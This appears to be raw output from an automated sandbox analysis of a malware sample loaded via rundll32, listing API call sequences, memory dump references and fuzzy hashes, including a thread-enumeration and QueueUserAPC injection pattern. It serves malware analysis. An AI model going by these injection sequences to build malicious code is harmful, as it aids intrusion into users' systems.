                                • StrChrA.SHLWAPI(00000000,0000002C,765BD3B0,00000000,76C85520,76CDF710), ref: 03478030
                                • StrChrA.SHLWAPI(00000001,0000002C), ref: 03478043
                                • StrTrimA.SHLWAPI(00000000,?), ref: 03478066
                                • StrTrimA.SHLWAPI(00000001,?), ref: 03478075
                                • lstrlen.KERNEL32(00000000), ref: 034780AA
                                • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 034780BD
                                • lstrcpy.KERNEL32(00000004,00000000), ref: 034780DB
                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 034780FF
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapTrim$AllocateFreelstrcpylstrlen
                                • String ID: W
                                • API String ID: 1974185407-655174618
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(0616CBB8,00000000,00000000,00000000,?), ref: 03483CBA
                                • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 03483CC9
                                • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 03483CD6
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 03483CEE
                                • lstrlen.KERNEL32(?,00000000,00000000,00000000,?), ref: 03483CFA
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03483D16
                                • wsprintfA.USER32 ref: 03483DF8
                                • memcpy.NTDLL(00000000,00004000,?), ref: 03483E45
                                • InterlockedExchange.KERNEL32(0349A128,00000000), ref: 03483E63
                                • HeapFree.KERNEL32(00000000,00000000), ref: 03483EA4
                                  • Part of subcall function 0348E3CD: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 0348E3F6
                                  • Part of subcall function 0348E3CD: memcpy.NTDLL(00000000,?,?), ref: 0348E409
                                  • Part of subcall function 0348E3CD: RtlEnterCriticalSection.NTDLL(0349A428), ref: 0348E41A
                                  • Part of subcall function 0348E3CD: RtlLeaveCriticalSection.NTDLL(0349A428), ref: 0348E42F
                                  • Part of subcall function 0348E3CD: HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 0348E467
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Heap$AllocateCriticalFreeSectionmemcpy$EnterExchangeInterlockedLeavewsprintf
                                • String ID:
                                • API String ID: 4198405257-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • LoadLibraryA.KERNEL32(?,?,00000000,00000000,?,00000001,?,?,?,?,?,?,?,03479100,?), ref: 03488D13
                                • TlsAlloc.KERNEL32(?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D1D
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D46
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D54
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D62
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D70
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D7E
                                • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,03479100,?,?,?,?,?), ref: 03488D8C
                                • ___HrLoadAllImportsForDll@4.DELAYIMP ref: 03488DB6
                                • HeapFree.KERNEL32(00000000,00000000,00000000,?,0000000C,00000000,?,?,?,?,?,?,?,?,03479100,?), ref: 03488E37
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Load$Library$AllocDll@4FreeHeapImports
                                • String ID:
                                • API String ID: 1792504554-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03472F91: memset.NTDLL ref: 03472FB3
                                  • Part of subcall function 03472F91: CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 0347305D
                                • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 0348E903
                                • CloseHandle.KERNEL32(?), ref: 0348E90F
                                • PathFindFileNameW.SHLWAPI(?), ref: 0348E91F
                                • lstrlenW.KERNEL32(00000000), ref: 0348E928
                                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0348E939
                                • wcstombs.NTDLL ref: 0348E948
                                • lstrlen.KERNEL32(?), ref: 0348E955
                                • UnmapViewOfFile.KERNEL32(?,?,?,00000000,00000001,?), ref: 0348E994
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0348E9A7
                                • DeleteFileW.KERNEL32(?), ref: 0348E9B4
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
                                • String ID:
                                • API String ID: 2256351002-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetTickCount.KERNEL32 ref: 0348B9F9
                                • CreateFileW.KERNEL32(03480971,80000000,00000003,0349A1E8,00000003,00000000,00000000,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA16
                                • GetLastError.KERNEL32(?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BABE
                                  • Part of subcall function 0349087A: lstrlen.KERNEL32(?,00000000,0348BA3E,00000027,0349A1E8,?,00000000,?,?,0348BA3E,?,00000001,?,03480971,00000000,?), ref: 034908B0
                                  • Part of subcall function 0349087A: lstrcpy.KERNEL32(00000000,00000000), ref: 034908D4
                                  • Part of subcall function 0349087A: lstrcat.KERNEL32(00000000,00000000), ref: 034908DC
                                • GetFileSize.KERNEL32(03480971,00000000,?,00000001,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA49
                                • CreateFileMappingA.KERNEL32(03480971,0349A1E8,00000002,00000000,00000000,03480971), ref: 0348BA5D
                                • lstrlen.KERNEL32(03480971,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA79
                                • lstrcpy.KERNEL32(?,03480971), ref: 0348BA89
                                • GetLastError.KERNEL32(?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BA91
                                • HeapFree.KERNEL32(00000000,03480971,?,03480971,00000000,?,0347C1F8,00000000), ref: 0348BAA4
                                • CloseHandle.KERNEL32(03480971,?,00000001,?,03480971), ref: 0348BAB6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
                                • String ID:
                                • API String ID: 194907169-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0347EE2A
                                • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0347EE36
                                • GetModuleHandleA.KERNEL32(?,0616978E,00000000,?,00000000), ref: 0347EE56
                                • GetProcAddress.KERNEL32(00000000), ref: 0347EE5D
                                • Thread32First.KERNEL32(?,0000001C), ref: 0347EE6D
                                • OpenThread.KERNEL32(001F03FF,00000000,?), ref: 0347EE88
                                • QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 0347EE99
                                • CloseHandle.KERNEL32(00000000), ref: 0347EEA0
                                • Thread32Next.KERNEL32(?,0000001C), ref: 0347EEA9
                                • CloseHandle.KERNEL32(?), ref: 0347EEB5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
                                • String ID:
                                • API String ID: 2341152533-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • SetEvent.KERNEL32(00000000,?,0348507B), ref: 0347DC56
                                  • Part of subcall function 03485D52: InterlockedExchange.KERNEL32(?,000000FF), ref: 03485D59
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,0348507B), ref: 0347DC76
                                • CloseHandle.KERNEL32(00000000,?,0348507B), ref: 0347DC7F
                                • CloseHandle.KERNEL32(00000000,?,?,0348507B), ref: 0347DC89
                                • RtlEnterCriticalSection.NTDLL(?), ref: 0347DC91
                                • RtlLeaveCriticalSection.NTDLL(?), ref: 0347DCA9
                                • Sleep.KERNEL32(000001F4), ref: 0347DCB8
                                • CloseHandle.KERNEL32(00000000), ref: 0347DCC5
                                • LocalFree.KERNEL32(?), ref: 0347DCD0
                                • RtlDeleteCriticalSection.NTDLL(?), ref: 0347DCDA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
                                • String ID:
                                • API String ID: 1408595562-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,03473DA2,00000000,00000001,?,?,?), ref: 0347DD92
                                • lstrlen.KERNEL32(?), ref: 0347DDA2
                                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0347DDD6
                                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0347DE01
                                • memcpy.NTDLL(00000000,?,?), ref: 0347DE20
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347DE81
                                • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0347DEA3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Allocatelstrlenmemcpy$Free
                                • String ID: W
                                • API String ID: 3204852930-655174618
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0347D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,0348DD0F,00000000,00000000,00000004,00000000,?,0347DBAC,?,?,00000000), ref: 0347D435
                                  • Part of subcall function 0347D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,0348DD0F,00000000,00000000,00000004,00000000,?,0347DBAC,?), ref: 0347D493
                                  • Part of subcall function 0347D429: lstrcpy.KERNEL32(00000000,00000000), ref: 0347D4A3
                                • lstrlen.KERNEL32(00000008,?,?,00000000,00000004,00000000), ref: 0347A153
                                • wsprintfA.USER32 ref: 0347A181
                                • lstrlen.KERNEL32(00000000,20000000,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 0347A1DF
                                • GetLastError.KERNEL32 ref: 0347A1F6
                                • ResetEvent.KERNEL32(?), ref: 0347A20A
                                • ResetEvent.KERNEL32(?), ref: 0347A20F
                                • GetLastError.KERNEL32 ref: 0347A227
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$ErrorEventLastReset$lstrcpymemcpywsprintf
                                • String ID: `
                                • API String ID: 2276693960-1850852036
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(034743C6,00000000,?,?,?,?,034743C6,00000035,00000000,?,00000000), ref: 034731A2
                                • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 034731B8
                                • memcpy.NTDLL(00000010,034743C6,00000000,?,?,034743C6,00000035,00000000), ref: 034731EE
                                • memcpy.NTDLL(00000010,00000000,00000035,?,?,034743C6,00000035), ref: 03473209
                                • CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 03473227
                                • GetLastError.KERNEL32(?,?,034743C6,00000035), ref: 03473231
                                • HeapFree.KERNEL32(00000000,00000000,?,?,034743C6,00000035), ref: 03473254
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
                                • String ID: (
                                • API String ID: 2237239663-3887548279
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 0347EC1B
                                • RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 0347ECD3
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 0347EC69
                                • GetProcAddress.KERNEL32(00000000,?), ref: 0347EC82
                                • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0347ECA1
                                • FreeLibrary.KERNEL32(00000000,?,00000008,?,00000001), ref: 0347ECB3
                                • GetLastError.KERNEL32(?,00000008,?,00000001), ref: 0347ECBB
                                Strings
                                • Software\Microsoft\WAB\DLLPath, xrefs: 0347EC0C
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLibrary$AddressAllocateCloseFreeHeapLoadOpenProc
                                • String ID: Software\Microsoft\WAB\DLLPath
                                • API String ID: 1628847533-3156921957
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL ref: 03487777
                                • memset.NTDLL ref: 0348778B
                                  • Part of subcall function 03491ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F02
                                  • Part of subcall function 03491ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 03491F16
                                  • Part of subcall function 03491ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,03472C89,?), ref: 03491F30
                                  • Part of subcall function 03491ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,03472C89,?,?,?), ref: 03491F5A
                                • GetCurrentThreadId.KERNEL32 ref: 03487818
                                • GetCurrentThread.KERNEL32 ref: 0348782B
                                • RtlEnterCriticalSection.NTDLL(0616C2D0), ref: 034878D2
                                • Sleep.KERNEL32(0000000A), ref: 034878DC
                                • RtlLeaveCriticalSection.NTDLL(0616C2D0), ref: 03487902
                                • HeapFree.KERNEL32(00000000,?), ref: 03487930
                                • HeapFree.KERNEL32(00000000,00000018), ref: 03487943
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCriticalCurrentFreeQuerySectionThreadValue$CloseEnterLeaveSleepmemset
                                • String ID:
                                • API String ID: 1146182784-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 034870C3: RtlEnterCriticalSection.NTDLL(0349A428), ref: 034870CB
                                  • Part of subcall function 034870C3: RtlLeaveCriticalSection.NTDLL(0349A428), ref: 034870E0
                                  • Part of subcall function 034870C3: InterlockedIncrement.KERNEL32(0000001C), ref: 034870F9
                                • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 0348284F
                                • memset.NTDLL ref: 03482860
                                • lstrcmpi.KERNEL32(?,?), ref: 034828A0
                                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 034828CC
                                • memcpy.NTDLL(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,03488974), ref: 034828E0
                                • memset.NTDLL ref: 034828ED
                                • memcpy.NTDLL(-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 03482906
                                • memcpy.NTDLL(-00000005,?,00000007,-00000004,?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 03482929
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,03488974), ref: 03482946
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
                                • String ID:
                                • API String ID: 694413484-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0348C9CC
                                • lstrlen.KERNEL32(?), ref: 0348C9D4
                                • lstrlen.KERNEL32(?), ref: 0348CA3F
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0348CA6A
                                • memcpy.NTDLL(00000000,00000002,?), ref: 0348CA7B
                                • memcpy.NTDLL(00000000,?,?), ref: 0348CA91
                                • memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 0348CAA3
                                • memcpy.NTDLL(00000000,034953E8,00000002,00000000,?,?,00000000,?,?), ref: 0348CAB6
                                • memcpy.NTDLL(00000000,?,00000002), ref: 0348CACB
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: memcpy$lstrlen$AllocateHeap
                                • String ID:
                                • API String ID: 3386453358-0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 034870C3: RtlEnterCriticalSection.NTDLL(0349A428), ref: 034870CB
                                  • Part of subcall function 034870C3: RtlLeaveCriticalSection.NTDLL(0349A428), ref: 034870E0
                                  • Part of subcall function 034870C3: InterlockedIncrement.KERNEL32(0000001C), ref: 034870F9
                                • RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 034760AC
                                • lstrlen.KERNEL32(00000008,?,?,?,0348F140,00000000,00000000,-00000008), ref: 034760BB
                                • RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 034760CD
                                • HeapFree.KERNEL32(00000000,00000000,?,?,?,0348F140,00000000,00000000,-00000008), ref: 034760DD
                                • memcpy.NTDLL(00000000,-00000008,00000000,?,?,?,0348F140,00000000,00000000,-00000008), ref: 034760EF
                                • lstrcpy.KERNEL32(00000020), ref: 03476121
                                • RtlEnterCriticalSection.NTDLL(0349A428), ref: 0347612D
                                • RtlLeaveCriticalSection.NTDLL(0349A428), ref: 03476185
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 3746371830-0
                                • Opcode ID: 726199bbc9806310596a1be87faca7ace7892e7d83bf464c32ada666669179ae
                                • Instruction ID: 84b03185f7886304f5ff36a793e01cecf609d73ad89e6c928f6a188feff911da
                                • Opcode Fuzzy Hash: 726199bbc9806310596a1be87faca7ace7892e7d83bf464c32ada666669179ae
                                • Instruction Fuzzy Hash: 45418874400B05EFDB21EF19C848B9ABBFAFF18304F25841BE849AF205D738A954CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03485119: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0348514B
                                  • Part of subcall function 03485119: HeapFree.KERNEL32(00000000,00000000,?,?,0348FC0D,?,00000022,00000000,00000000,00000000,?,?), ref: 03485170
                                  • Part of subcall function 034879A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0348FC2E,?,?,?,?,?,00000022,00000000,00000000), ref: 034879DC
                                  • Part of subcall function 034879A0: HeapFree.KERNEL32(00000000,00000000,00000000,00000001,?,0348FC2E,?,?,?,?,?,00000022,00000000,00000000,00000000,?), ref: 03487A2F
                                • lstrlen.KERNEL32(00000000,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0348FC63
                                • lstrlen.KERNEL32(?,?,0000001D,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0348FC6B
                                • lstrlen.KERNEL32(?), ref: 0348FC75
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 0348FC8A
                                • wsprintfA.USER32 ref: 0348FCC6
                                • HeapFree.KERNEL32(00000000,00000000,0000002D,00000000,00000000,00000000), ref: 0348FCE5
                                • HeapFree.KERNEL32(00000000,?), ref: 0348FCFA
                                • HeapFree.KERNEL32(00000000,?), ref: 0348FD07
                                • HeapFree.KERNEL32(00000000,00000000,?,0000001C,?,?,?,?,?,00000022,00000000,00000000,00000000,?,?), ref: 0348FD15
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$lstrlen$Allocate$wsprintf
                                • String ID:
                                • API String ID: 168057987-0
                                • Opcode ID: f1b67afba28fa632f1e17fbbada058306a6287d53dd4e7b6452d36c4e9e42bca
                                • Instruction ID: 4dc568e05fd546057ef3288c081885b0ab07458ba8dd4ee78e708a335dd4d4b0
                                • Opcode Fuzzy Hash: f1b67afba28fa632f1e17fbbada058306a6287d53dd4e7b6452d36c4e9e42bca
                                • Instruction Fuzzy Hash: 7F319A31600315AFCB11FFA6EC45E5FBBE8EF89210F05096BBA44AE251D77089189B96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0347F3DB
                                • GetLastError.KERNEL32 ref: 0347F3E5
                                • WaitForSingleObject.KERNEL32(000000C8), ref: 0347F40A
                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0347F42D
                                • SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0347F455
                                • WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0347F46A
                                • SetEndOfFile.KERNEL32(00001000), ref: 0347F477
                                • GetLastError.KERNEL32 ref: 0347F483
                                • CloseHandle.KERNEL32(00001000), ref: 0347F48F
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
                                • String ID:
                                • API String ID: 2864405449-0
                                • Opcode ID: 17711284ed6a1a6098a205befced9dbd997e68b3ce7967eeeadc742a1770310f
                                • Instruction ID: ba8c978acf233f554b6fca52eaa2ac6274f153e6fd69b6cbb2d03b0396aca24c
                                • Opcode Fuzzy Hash: 17711284ed6a1a6098a205befced9dbd997e68b3ce7967eeeadc742a1770310f
                                • Instruction Fuzzy Hash: 8B319371900208BFEB11DF65DC49BEEBBB8EF15329F244152F910BA1D0C3704A59DB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,03475674,00000008,?,00000010,00000001,00000000,0000003A), ref: 034906AC
                                • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 034906E0
                                • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 034906E8
                                • GetLastError.KERNEL32 ref: 034906F2
                                • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 0349070E
                                • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 03490727
                                • CancelIo.KERNEL32(?), ref: 0349073C
                                • CloseHandle.KERNEL32(?), ref: 0349074C
                                • GetLastError.KERNEL32 ref: 03490754
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
                                • String ID:
                                • API String ID: 4263211335-0
                                • Opcode ID: f69453f2e1d139a2c2255f2fc95c342d73ab59e559ad290d36d3a100df450a0d
                                • Instruction ID: d76075dbab0375b54db563afa1d096e4b3e9e5dd83c719d2c6403fc97954bb32
                                • Opcode Fuzzy Hash: f69453f2e1d139a2c2255f2fc95c342d73ab59e559ad290d36d3a100df450a0d
                                • Instruction Fuzzy Hash: 61215E31900218BFDF02AF65DC489EF7BB9EF45320B148093F915EA254D7308955CFA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(00000001,?,00000000,?,00000000,00000000,54C7FCBB,54C7FCBB,00000000,0347E231,00000000,76CDF5B0,03480348,?,00000001), ref: 03481C25
                                • _aulldiv.NTDLL(00000192,?,54D38000,00000192), ref: 03481C3B
                                • _snwprintf.NTDLL ref: 03481C60
                                • CreateFileMappingW.KERNEL32(000000FF,0349A1E8,00000004,00000000,00001000,?), ref: 03481C7C
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 03481C8E
                                • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 03481CA5
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?), ref: 03481CC6
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000192,?,54D38000), ref: 03481CCE
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                • String ID:
                                • API String ID: 1814172918-0
                                • Opcode ID: 4f2898ce52d8b85b400ad8500606621fa9a26820f05972b574cbabc618a81697
                                • Instruction ID: ad321f1e6e1df3b51eac5f4956f5b916f8e73d43c600893c83d705b2f57c9bf1
                                • Opcode Fuzzy Hash: 4f2898ce52d8b85b400ad8500606621fa9a26820f05972b574cbabc618a81697
                                • Instruction Fuzzy Hash: 5D2102B6A00204BBD722FF68DC06F9E7BE8AB45710F250163F605FF284D6709906CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlenW.KERNEL32(00000000,?,06169A2B,?,?,06169A2B,?,?,06169A2B,?,?,06169A2B,?,00000000,00000000,00000000), ref: 0348CC58
                                • lstrcpyW.KERNEL32(00000000,?), ref: 0348CC7B
                                • lstrcatW.KERNEL32(00000000,00000000), ref: 0348CC83
                                • lstrlenW.KERNEL32(00000000,?,06169A2B,?,?,06169A2B,?,?,06169A2B,?,?,06169A2B,?,?,06169A2B,?), ref: 0348CCCE
                                • memcpy.NTDLL(00000000,?,?,?), ref: 0348CD36
                                • LocalFree.KERNEL32(?,?), ref: 0348CD4F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
